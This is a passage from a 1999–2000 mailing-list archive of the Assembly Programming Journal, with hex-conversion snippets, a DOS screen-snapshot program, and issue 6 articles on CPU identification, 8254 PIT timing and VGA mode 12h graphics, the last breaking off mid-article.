:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                                       TOHEX
                                                                       by
Ronald

;Summary:       Convert hexadecimal digits to ASCII
;Compatibility: PowerPC platform
;Notes:         Reads 3 parameters in R1-R3
;               R1 = Number to convert to ASCII representation
;               R2 = Number of LSD's of R1 to convert
;               R3 = Address to store ASCII representation of number to
;               R31 = Temp register that holds 4 bits
;               Note that R1 is ruined during execution
.global TOHEX, TOHEX_LOOP, LT_TEN, STEP_OVER, TOHEX_EXIT
TOHEX:
         cmpwi R2, 0
         be TOHEX_EXIT
TOHEX_LOOP:
         andi. R31, R1, 15
         cmpwi R31, 10
         blt LT_TEN
         addi R31, R31, 'A'-10
         b STEP_OVER
LT_TEN:
         ori R31, R31, '0'
STEP_OVER:
         srwi R1, R1, 4
         subi R2, R2, 1
         stbx R31, R2, R3
         cmpwi R2, 0
         bne TOHEX_LOOP
TOHEX_EXIT:
         blr


Hex2ASCII
                                                                      by
cpuburn
;Summary:       Converts
;Compatibility: K7
;Notes:         This
;      While doing some light reading of the AMD K7 Athlon Optimization
;Manual, I came across one of the neatest hex-to-ASCII converters
;I've ever seen:

Example 5 - Hexadecimal to ASCII conversion
(y=x < 10 ? x + 0x30: x + 0x41):

MOV AL, [X]  ;load X value
CMP AL, 10   ;if x is less than 10, set carry flag
SBB AL, 69h  ;0..9 -> 96h, Ah.. h -> A1h...A6h
DAS          ;0..9: subtract 66h, Ah.. h: Sub. 60h
MOV [Y],AL   ;save conversion in y

                                                           MMX ltostr
                                                           by Cecchinel
Stephan
;Summary:       Convert long [dword] value to an ASCII string
;Compatibility: MMX
;Notes:         Converts a number in EAX to an 8 bytes hexadecimal string
;               at [edi]
;               14 clocks on a Celeron-333
Sum1:      dd 0x30303030, 0x30303030
Mask1:    dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1:    dd 0x09090909, 0x09090909
Hex32:
         bswap eax
         movq mm3,[Sum1]
         movq mm4,[Comp1]
         movq mm2,[Mask1]
         movq mm5,mm3
         psubb mm5,mm4
         movd mm0,eax
         movq mm1,mm0
         psrlq mm0,4
         pand mm0,mm2
         pand mm1,mm2
         punpcklbw mm0,mm1
         movq mm1,mm0
         pcmpgtb mm0,mm4
         pand mm0,mm5
         paddb mm1,mm3
         paddb mm1,mm0
         movq [edi],mm1
         ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                               by Laura
Fairhead


Challenge
~~~~~~~~~
Write a program that takes a snapshot of a text screen and writes it
to a file. It should work in any text mode and lines should be terminated
with newlines in the file so that it can easily be viewed in a standard
editor. ( 04Dh = 77 bytes )

Solution
~~~~~~~~
If you want to assemble this just remember FS = 064h, as MASM can't cope
with legal x86 code. Then just replace the (single) offset 0148h with
some name, then data is the filename at the end "SNAP",0. Obviously
the B's prefixing the addresses mean "BYTE PTR", and ALL the numbers
are in HEX.

=Z10 0
=NSUC0.COM
=L
0000004D
=U100 147
1CB6:0100 B8 30 11          MOV     AX,1130
1CB6:0103 32 FF             XOR     BH,BH
1CB6:0105 CD 10             INT     10              ;DL=rows-1
1CB6:0107 B4 0F             MOV     AH,0F
1CB6:0109 CD 10             INT     10              ;AH=columns
1CB6:010B 0E                PUSH    CS              ;1st BIOS call
1CB6:010C 07                POP     ES              ;corrupts ES
1CB6:010D 52                PUSH    DX              ;
1CB6:010E 50                PUSH    AX              ;set B[BP+1]=columns
1CB6:010F 8B EC             MOV     BP,SP           ;    B[BP+2]=rows
1CB6:0111 BA 48 01          MOV     DX,0148         ;open (CREATE) file
1CB6:0114 33 C9             XOR     CX,CX           ;name "SNAP"
1CB6:0116 B4 3C             MOV     AH,3C
1CB6:0118 CD 21             INT     21
1CB6:011A 93                XCHG    BX,AX           ;handle stays in BX
1CB6:011B 33 F6             XOR     SI,SI           ;SI read screen offset
1CB6:011D BA 80 00          MOV     DX,0080         ;DX data store in PSP
1CB6:0120 B8 00 B8          MOV     AX,B800
1CB6:0123 8E E0             MOV     FS,AX           ;FS screen segment
1CB6:0125 8B FA             MOV     DI,DX           ;outer loop rows
1CB6:0127 0F B6 4E 01       MOVZX   CX,B [BP+0001]  ;miss out the attribute
1CB6:012B 64 AD             FS: LODSW               ;byte, copying to
1CB6:012D AA                STOSB                   ;DS:080
1CB6:012E E2 FB             LOOP    012B
1CB6:0130 B8 0D 0A          MOV     AX,0A0D         ;n/l on row end
1CB6:0133 AB                STOSW
1CB6:0134 8B CF             MOV     CX,DI
1CB6:0136 2B CA             SUB     CX,DX           ;CX=data length
1CB6:0138 B4 40             MOV     AH,40           ;write row to file
1CB6:013A CD 21             INT     21
1CB6:013C FE 4E 02          DEC     B [BP+0002]     ;loop for row count
1CB6:013F 79 E4             JNS     0125
1CB6:0141 66 58             POP     EAX             ;clean-up stack
1CB6:0143 B4 3E             MOV     AH,3E           ;close file
1CB6:0145 CD 21             INT     21
1CB6:0147 C3                RET                     ;go CS:0 !
=D148 14C
1CB6:0148 53 4E 41 50 00                                  SNAP
=Q

If you've never seen the 2 BIOS calls before then you'd better take a look
at ralf brown's legendary interrupt list.

You may always overide the source segment DS: on a string instruction,
but you cannot override the destination segment ES: ever.

It's left as an exercise for you to incorporate error handling (since there
is none) and still better the length of this code ;)



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#15 From: "Hiroshimator" <hiroshimator@...>
Date: Wed Jan 5, 2000 12:10 am
Subject: Happy Millenium
hiroshimator@...
Send Email Send Email
 
Happy New Year and a productive ASM Millenium to all of you!

#14 From: "Michael Mondragon" <mammon_@...>
Date: Mon Nov 15, 1999 1:29 am
Subject: APJ Issue#6 Oct-Now 99
mammon_@...
Send Email Send Email
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                                Oct/Nov  99
:::\_____\::::::::::.                                               Issue     6
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Processor Identification"........................Chris.Dragan.&.Chili

"Timing with the 8254 PIT"...............................Jan.Verhoeven

"Programming the Universal Graphics Mode"................Jan.Verhoeven

"Conway's Game of Life".................................Laura.Fairhead

"'Ambulance Car' Disassembly"....................................Chili

"'Ambulance Car' Disinfector"....................................Chili

"Assembling for PIC's"...................................Jan.Verhoeven

"Splitting Strings"............................................mammon_

"String to Numeric Conversion"..........................Laura.Fairhead

Column: Win32 Assembly Programming
     "WndProc, The Dirty Way".................................X-Calibre
     "Programming the DOS Stub"...............................X-Calibre

Column: The Unix World
     "Using ioctl()"............................................mammon_

Column: Assembly Language Snippets
     "BinToString"....................................Cecchinel Stephan

Column: Issue Solution
     "Absolute Value"....................................Laura.Fairhead

----------------------------------------------------------------------
        ++++++++++++++++++Issue  Challenge+++++++++++++++++
		   Find the Absolute Value of a Register in  4 Bytes
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Evenutally I may have a
chance to be late on a monthly basis...

This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.

Additional highlighs include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.

Enough commentary; time to get this mag on the road!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                        Processor Identification
                                                        by Chris Dragan & Chili


Being able to identify the processor in which your program is running, can be a
very useful feature,  if not to ensure that  your program will work  on a wider
range of computers,  at least to provide minimum compatibility and guarantee it
not to crash on some processors.

The first part of this article  explains how to distinguish between older 80486
and lower  processors by checking  for known behaviours,  while the second part
(written by Chris)  takes it one step forward,  explaining how to use the CPUID
instruction on newer processors, checking the ID register by means of a TFR and
how to correctly identify a Cyrix processor.


EFLAGS Register
---------------
On old pre-286 CPUs,  bits 12 through 15 of the FLAGS register are always  set,
so we can  check for this  type of processor,  in opposition to newer ones,  by
attempting to clear those bits:

                 pushf
                 pop     ax
                 and     ax, 0fffh       ; clear bits 12-15
                 push    ax
                 popf
                 pushf
                 pop     ax
                 and     ax, 0f000h
                 cmp     ax, 0f000h      ; check if bits 12-15 are set
                 je      _is_an_older_cpu
                 jne     _is_a_286_or_higher

Once we know that we are at least on a 286 processor,  we can then check to see
if we're on a 32-bit processor  (386 or higher)  or on an actual 286.  For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:

                 pushf
                 pop     ax
                 or      ax, 0f000h      ; set bits 12-15
                 push    ax
                 popf
                 pushf
                 pop     ax
                 and     ax, 0f000h      ; check if bits 12-15 are clear
                 jz      _is_a_286
                 jnz     _is_a_386_or_higher

If instead, the processor is running in  protected mode these bits are used for
the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last
value loaded  into them on 32-bit processors  in real mode.  Also remember that
there is no virtual-8086 mode on 16-bit processors.

In order to find out if the processor is in real or protected mode we must test
if the  Protection Enable  flag  (bit 0 of CR0)  is set,  if so  then we're  in
protected mode:

                 smsw    ax
                 and     ax, 0001h       ; check if bit 0 (PE) is clear
                 jz      _real_mode
                 jnz     _protected_mode

To find out  if it is a 486 or a  newer processor we'll try  to set the AC flag
(bit 18),  since it  is always  clear on a  386 processor  (also NexGen Nx586),
unlike newer ones that allow it to be toggled:

                 pushfd
                 pop     eax
                 mov     ebx,eax
                 xor     eax,40000h      ; toggle bit 18
                 push    eax
                 popfd
                 pushfd
                 pop     eax
                 xor     eax,ebx         ; check if bit 18 changed
                 jz      _is_a_386
                 jnz     _is_a_486_or_higher

And finally to  check if we're in an  old 486 or in a  new 486 and other  newer
processors  (i.e. Pentium),  we'll try  to toggle  the ID flag  (bit 21)  which
indicates the presence of a processor that supports the CPUID instruction. This
part is explained below in a section about CPUID.


PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way,  updating the stack  pointer before  the value  of SP  is pushed  onto the
stack,  unlike newer processors  which push the value  of the SP register as it
existed before  the instruction  was executed  (both in  real and  virtual-8086
modes).

   Older CPUs            286+
   {                     {
    SP = SP - 2           TEMP = SP
    SS:SP = SP            SP = SP - 2
   }                      SS:SP = TEMP
                         }

   (credit for the PUSH SP algorithm representation goes to Robert Collins)

So all  one has to  do is see if  the values of  the SP register  are different
before and after the PUSH SP:

                 push    sp
                 pop     ax
                 cmp     ax, sp          ; check if SP values differ
                 je      _is_a_286_or_higher
                 jne     _is_an_older_cpu

Note - If you want  the same result  on all processors,  use the following code
        instead of a PUSH SP instruction:

                 push    bp
                 mov     bp, sp
                 xchg    bp, [bp]


Shift and Rotate Instructions
-----------------------------
Starting with the 186/88, all processors mask shift/rotate counts by modulo 32,
restricting  the maximum count to 31  (in all  operating modes,  including  the
virtual-8086 mode).  Earlier CPUs do not mask  the shift/rotation count,  using
all 8-bits of CL.  So, if we try to perform a 32-bit shift, on newer processors
we'll  end up  with the  same result  (since the  shift count  is masked to 0),
whereas on an older processor the result will be zero:

                 mov     ax, 0ffffh
                 mov     cl, 32
                 shl     ax, cl          ; check if result is zero
                 jz      _is_an_older_cpu
                 jnz     _is_a_18x_or_higher


MUL Instruction
---------------
NEC processors  differ from Intel's  with respect to  the handling of  the zero
flag (ZF) during a MUL operation. While a NEC V20/V30 does not clear ZF after a
non-zero multiplication result, but only according to it, an Intel 8086/88 will
always clear it (note that this is only true for the specified processors):

                 xor     al, al          ; force ZF to set
                 mov     al, 40h
                 mul     al              ; check if ZF is clear
                 jz      _is_a_NEC_V20_V30
                 jnz     _is_an_Intel_808x

In addition to the list of sites where you can find more information,  provided
by Chris at the end of this article, you can also try this one:

         http://grafi.ii.pw.edu.pl/gbm/x86/     (Grzegorz Mazur)

And also the following packages/programs (available somewhere in the net):

         The Undocumented PC                    (Frank van Gilluwe)
         HelpPC                                 (David Jurgens)
         80x86.CPU file                         (Christian Ludloff)


ID Register
-----------
Beginning  with the 80386 processor,  Intel included  a so-called  ID register,
which  contains  information  about  the  processor  model and  stepping.  This
register is accessible in an unusual way - it is passed in DX after reset.

To read the ID register one must proceed the following steps:

  1. By storing value 0Ah (resume with jump)  at address 0Fh (reset code) in the
     CMOS data area,  inform BIOS not to  issue POST after reset,  but to return
     the control to the program.
  2. Update after-reset-far-jump address at 0040h:0067h.
  3. Set  shutdown  status  word  (0040h:0072h)  to  0,   to  avoid  undesirable
     side-effects.
  4. Cause a reset.

Causing a reset  is typically done by  issuing a so-called  triple-fault-reset,
i.e.  causing  an error  from which the  processor  cannot  recover and  enters
a reset state.  TFR (triple...)  can be  done only  if we  have enough  control
over  the processor,  i.e.  under plain  DOS  in  real mode  (no EMS)  or under
Win'95 (this is risky).  The following code shows how to do it in DOS. The code
is assumed to be in a COM program.

;------------------------------------------------------------------------------

section .data

GDT             dd 0, 0                 ; Selector 0 is empty
                 dd 0000FFFFh, 00009A00h ; Selector 8 - code segment
GDTR            dw 000Fh, 0, 0          ; Limit 0Fh - two selectors
IDTR            dw 0, 0, 0              ; Empty IDT will cause TFR

section .text

         ; Ensure that we are in real mode, not in V86
                 smsw    ax
                 and     al, 1
                 jnz     near _skip_tfr_since_in_v86_mode

         ; Update code descriptor as we are going to enter pmode
                 xor     eax, eax
                 mov     ax, cs
                 shl     eax, 4
                 or      [GDT+10], eax
                 add     eax, GDT
                 mov     [GDTR+2], eax

         ; Update reset code in CMOS data area
                 cli                             ; Disable interrupts
                 mov     [SaveSP], sp            ; Save stack pointer
                 mov     al, 0Fh                 ; Address 0Fh in CMOS area
                 out     70h, al
times 3         jmp     short $+2               ; Short delay
                 mov     al, 0Ah                 ; Value 0Ah - far jump
                 out     71h, al

         ; Update resume address
                 push    word 0
                 pop     es
                 mov     [es:0467h], word _tfr   ; offset
                 mov     [es:0469h], cs          ; segment
                 mov     [es:0472h], word 0      ; Update shutdown status

         ; Switch to pmode
                 lgdt    [GDTR]                  ; Load GDT
                 lidt    [IDTR]                  ; Load empty IDT
                 smsw    ax
                 or      al, 01h                 ; Set pmode bit
                 lmsw    ax
                 jmp     0008h:_reset            ; Reload CS
_reset:         mov     ax, [cs:0FFFFh]         ; Reach beyond segment limit

         ; After reset we are here with DX containing the ID register
_tfr:           cli
                 mov     ax, cs
                 mov     ds, ax
                 mov     es, ax
                 mov     ss, ax
                 mov     sp, [SaveSP]
                 sti

;------------------------------------------------------------------------------

Of course there are  also other ways of reading the ID register.  They are well
described in DDJ (www.x86.org).

As said before,  the ID register contains information about processor model and
stepping. The format of the register is as follows:

         bits 15..12     - stepping
         bits 11..8      - model
         bits 7..0       - revision

Some example ID register values:

         0303    i386DX
         2303    i386SX
         3301    i376

This format  of the ID register  was used in  Intel 386 processors  (all except
RapidCAD), AMD 386 processors and most of IBM 486 processors.

Another format  of the ID register  was introduced  with Intel 486  processors.
This format is similar  to the format of  CPUID model information  (see below),
and until the  Pentium was kept the same.  However newer processors do not keep
any useful information in the ID register (it is usually 0). This also concerns
Cyrix 486 processors.

         bits 15..14     - unused, zero
         bits 13..12     - typically indicate overdrive
         bits 11..8      - model
         bits 7..4       - stepping
         bits 3..0       - revision

And some example ID register values with this format for Intel processors:

         0401    i486DX-25/33
         0421    i486SX
         0451    i486SX2


Cyrix DIR
---------
All Cyrix processors have a Device-Identification-Registers,  which are used to
identify  these processors.  To read DIRs,  one first has to determine  that he
uses a Cyrix processor. This can be accomplished in two ways:

  1. On modern processors using CPUID instruction.
  2. On first Cyrix processors issuing 5/2 method.

If  there  is  no  CPUID  instruction,   one  has  to  use  the  other  way  of
determination.  If one  knows that he  is on a  486 processor,  he can  use the
following code:

                 mov     ax, 0005h
                 mov     cl, 2
                 sahf
                 div     cl
                 lahf
                 cmp     ah, 2
                 je      _we_are_on_cyrix
                 jne     _this_is_not_cyrix

Once we have  determined we are  on a Cyrix processor,  we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h.  Port 22h keeps register number
and port 23h register value.

         ; This function reads a Cyrix control register
         ; It expects a register address in AL and returns value also in AL
ReadCCR:        out     22h, al         ; select register
times 3         jmp     short $+2       ; delay
                 in      al, 23h         ; get register contents
                 ret

DIRs have offsets  0FEh (DIR1) and 0FFh (DIR0).  DIR1 contains revision,  while
DIR0 contains model/stepping. The following code reads them:

                 mov     al, 0FEh
                 call    ReadCCR
                 mov     [DIR1], al
                 mov     al, 0FFh
                 call    ReadCCR
                 mov     [DIR0], al

Example DIR0 values:

         1B      Cx486DX2
         31      6x86(L) clock x2
         55      6x86MX clock x4


CPUID Instruction
-----------------
All newer  processors have  the CPUID instruction,  which helps  to identify on
what  processor  we are.  Before using it,  we must  first determine  if it  is
supported, by flipping the ID flag (bit 21 of EFLAGS).

                 pushfd
                 pop     eax
                 xor     eax, 00200000h  ; flip bit 21
                 push    eax
                 popfd
                 pushfd
                 pop     ecx
                 xor     eax, ecx        ; check if bit 21 was flipped
                 jnz     _cpuid_supported
                 jz      _no_cpuid

The only problem may be that NexGen processors do not support the ID flag,  but
they do support the CPUID instruction.  To determine that, we must hook Invalid
Opcode  exception  (int6)  and  execute  the instruction.  If the  exception is
triggered, CPUID is not supported.

Also some  early  Cyrix  processors  (namely  5x86  and  6x86)  have the  CPUID
instruction disabled.  To enable it, we must first enable extended CCRregisters
and then enable the instruction, setting bit 7 in CCR4.

         ; Enable extended CCRs
                 mov     al, 0C3h        ; C3 corresponds to CCR3
                 call    ReadCCR
                 and     ah, 0Fh         ; bits 7..4 of CCR3 <- 0001b
                 or      ah, 10h
                 call    WriteCCR

         ; Enable CPUID
                 mov     al, 0E8h        ; E8 corresponds to CCR4
                 call    ReadCCR
                 or      ah, 80h         ; bit 7 enables CPUID
                 call    WriteCCR

The following functions are used to read/write CCRs:

ReadCCR:        out     22h, al         ; Select control register
times 3         jmp     short $+2
                 xchg    al, ah
                 in      al, 23h         ; Read the register
                 xchg    al, ah
                 ret

WriteCCR:       out     22h, al         ; Select control register
times 3         jmp     short $+2
                 mov     al, ah
                 out     23h, al         ; Write the register
                 ret

After enabling CPUID we must  test if it is supported by  flipping the ID flag,
unless  of course  we  have determined  that  we are not  on a  5x86 or 6x86 by
reading DIRs.

Once we have determined that CPUID is supported,  we can use it to identify the
processor.  The instruction expects EAX  to hold a function number  and returns
information corresponding to this number in EAX, ECX,EDX and EBX.  The two most
important levels are listed below.

         level 0 (eax=0) returns:

         eax             Maximum available level
         ebx:edx:ecx     Vendor ID in ASCII characters
                         Intel   - "GenuineIntel" (ebx='Genu', bl='G'(47h))
                         AMD     - "AuthenticAMD"
                         Cyrix   - "CyrixInstead"
                         Rise    - "RiseRiseRise"
                         Centaur - "CentaurHauls"
                         NexGen  - "NexGenDriven"
                         UMC     - "UMC UMC UMC "

         level 1 (eax=1) returns:

         eax             bits 13..12     0 - normal
                                         1 - overdrive
                                         2 - secondary in dual system
                         bits 11..8      model
                         bits 7..4       stepping
                         bits 3..0       revision
                         If Processor Serial Number is enabled, all 32
                         bits are treated as the high bits (95..64) of
                         the number.
         edx             Processor features (e.g. bit 23 indicates MMX)

There are also  other levels,  i.e. level 2 returns cache  and TLB descriptors,
level 3 the rest of Processor Serial Number.

Other processors (AMD, Cyrix) also support extended levels.  The first extended
level is  80000000h and  it returns in  EAX the maximum  extended level.  These
extended levels  return information  specific to  that processors,  e.g. 3DNow!
support or processor name.

This example code determines MMX support:

         ; First check maximum available level
                 xor     eax, eax        ; eax = 0 (level 0)
                 cpuid
                 cmp     eax, 0
                 jng     _no_higher_levels

         ; Now check MMX support
                 mov     eax, 1          ; level 1
                 cpuid
                 test    edx, 00800000h  ; bit 23 is set if MMX is supported
                 jnz     _mmx_supported
                 jz      _no_mmx

As this is not  the place for listing all the  available information about what
values  are returned  by CPUID,  ID register or DIRs,  you should get  the most
recent information from the processor vendors:

         www.intel.com
         www.amd.com
         www.cyrix.com

Also you can find very valuable information about the identification topic on:

         www.sandpile.org
         www.x86.org
         www.cs.cmu.edu/~ralf/files.html



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
																		  Timing with the 8254 PIT
                                                        by Jan Verhoeven


Some time ago I saw a note on the mailinglist from someone in need for a
flexible timer function. For this, there are several concepts.

First, there is the timertick which is updated every 55 ms. For long
time delays, this is the best method. Just read the timervalue at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.

A second approach is to use modern BIOS-ses which have a timingfunction
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.

A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (upto 8 kHz) which even has interrupt
capabillities for automated functions and simple multitaskings.

But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.

This chip can be put in many operating modes, but we want it to do the
following:

         - start counting at a certain value
         - count down
         - latched reading mode
         - no influence on further PC operation

The counting sequence for the PC is as follows:

         - there are 2^16 BIOS-timervalue updates per hour
         - there are 2^16 8254 clockpulses per timertick

So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.

In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.

Here comes.....

---------- OpenTimer ---------------------------- Start ----------

PROCEDURE OpenTimer;        (*  open timer chip in mode 2   *)

BEGIN
     ASM
         MOV  AL, 34H
         OUT  43H, AL
         XOR  AL, AL
         OUT  40H, AL
         OUT  40H, AL
     END;
END OpenTimer;

---------- OpenTimer ----------------------------- End -----------

The value 34h is constructed as follows:

         bit     function
        -----    ---------------------------
        6 - 7    select counter (0 - 3)
        4 - 5    Read/write mode
        1 - 3    Select countermode
          0      Binary or BCD

For this case we selected:

         - counter 00
         - read/write two bytes from/to counterchip
         - Mode 2
         - binary values

These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....

It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.

---------- CloseTimer --------------------------- Start ----------

PROCEDURE CloseTimer;           (*  close timer chip    *)

BEGIN
     ASM
         MOV  AL, 36H
         OUT  43H, AL
         XOR  AL, AL
         OUT  40H, AL
         OUT  40H, AL
     END;
END CloseTimer;

---------- CloseTimer ---------------------------- End -----------

This function just restores the timer to it's default mode and clears
the counting registers. The value "36h" means:

         - counter 00
         - read/write two bytes from/to counterchip
         - Mode 3
         - binary values

---------- ReadTimer ---------------------------- Start ----------

PROCEDURE ReadTimer () : CARDINAL;     (*  read timer   *)

VAR     Time        : CARDINAL;

BEGIN
     ASM
         MOV  AL, 6
         OUT  43H, AL
         IN   AL, 40H
         MOV  AH, AL
         IN   AL, 40H
         XCHG AH, AL
         MOV  [Time], AX
     END;
     RETURN Time;
END ReadTimer;

---------- ReadTimer ----------------------------- End -----------

After we opened the timer, it might be a good idea to also use it. This
is done in a two-step operation:

  - current value of counting register is stored in On-Chip buffer
  - the low byte is read in first
  - the high byte is read in second
  - low and high byte are put in right order

Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!

The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".

---------- MilliSeconds ------------------------- Start ----------

PROCEDURE MilliSeconds (ms : CARDINAL);

VAR     MaxCount        : CARDINAL;

BEGIN
     MaxCount := 65535 - ms * 1193;
     OpenTimer;
     WHILE ReadTimer () > MaxCount DO
         (*      Nothing!     *)
     END;
     CloseTimer;
END MilliSeconds;

---------- MilliSeconds -------------------------- End -----------

This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.

Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmatics.

This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.

The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the

---------- TestTimer ---------------------------- Start ----------

PROCEDURE TestTimer;

VAR     First, Last, Delta, k        : CARDINAL;

BEGIN
     OpenTimer;
     First := ReadTimer ();
     WriteCard (First, 6);       Write (Tab);
     FOR k := 1 TO 10000 DO
         (*      Nothing!     *)
     END;
     Last := ReadTimer ();
     Delta := First - Last;
     WriteCard (Delta, 6);       WriteLn;
     CloseTimer;
END TestTimer;

---------- TestTimer ----------------------------- End -----------

You could use this routine to calibrate a timingloop, but on modern PC
architectures this could well lead to disasters. Modern CPU's are so
damned fast, that your loopcounter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.

A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timingloops, assuming that 1 IN operation is
about 1 microsecond. Bit it could well lead to trouble on modern PCI
hardware.

All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!


In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                        Programming for the one and only universal graphics mode
                                                                by Jan Verhoeven


If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).

Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omni present.

That's why I decided to port my textmode windows to this graphics mode.


The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.

If all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one for your own.


How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:

         mov     ax, 012
         int     010

and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.


Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.

For all my plotting, I use the following structure:

     -------------------------------- Window Information Block ------
     Infoblk1 STRUC
     Win_X    dw    ?        ; top-left window position, X and ...
     Win_Y    dw    ?        ;     ... Y
     Win_wid  dw    ?        ; window width and ...
     Win_hgt  dw    ?        ;     ... height
     CurrX    dw    ?        ; within window, current X-coordinate, ...
     CurrY    dw    ?        ;     ... and Y
     DeltaX   dw    ?
     DeltaY   dw    ?
     Indent   dw    ?        ; Indentation for characters in PIXELS!
     Multiply dw    ?        ; screenwidth handler
     Watte01  dw    ?        ;
     BoxCol   db    ?        ;     border colour
     TxtCol   db    ?        ;       text colour
     BckCol   db    ?        ; background colour
     MenuCol  db    ?        ;  menu text colour
              ENDS
     -------------------------------- Window Information Block ------

It will be clear after looking into this list, that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unity.

Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.

Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.

For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.

Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY postions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.

For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.

Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:

         PixAddr = CurrY * 80 + CurrX / 8

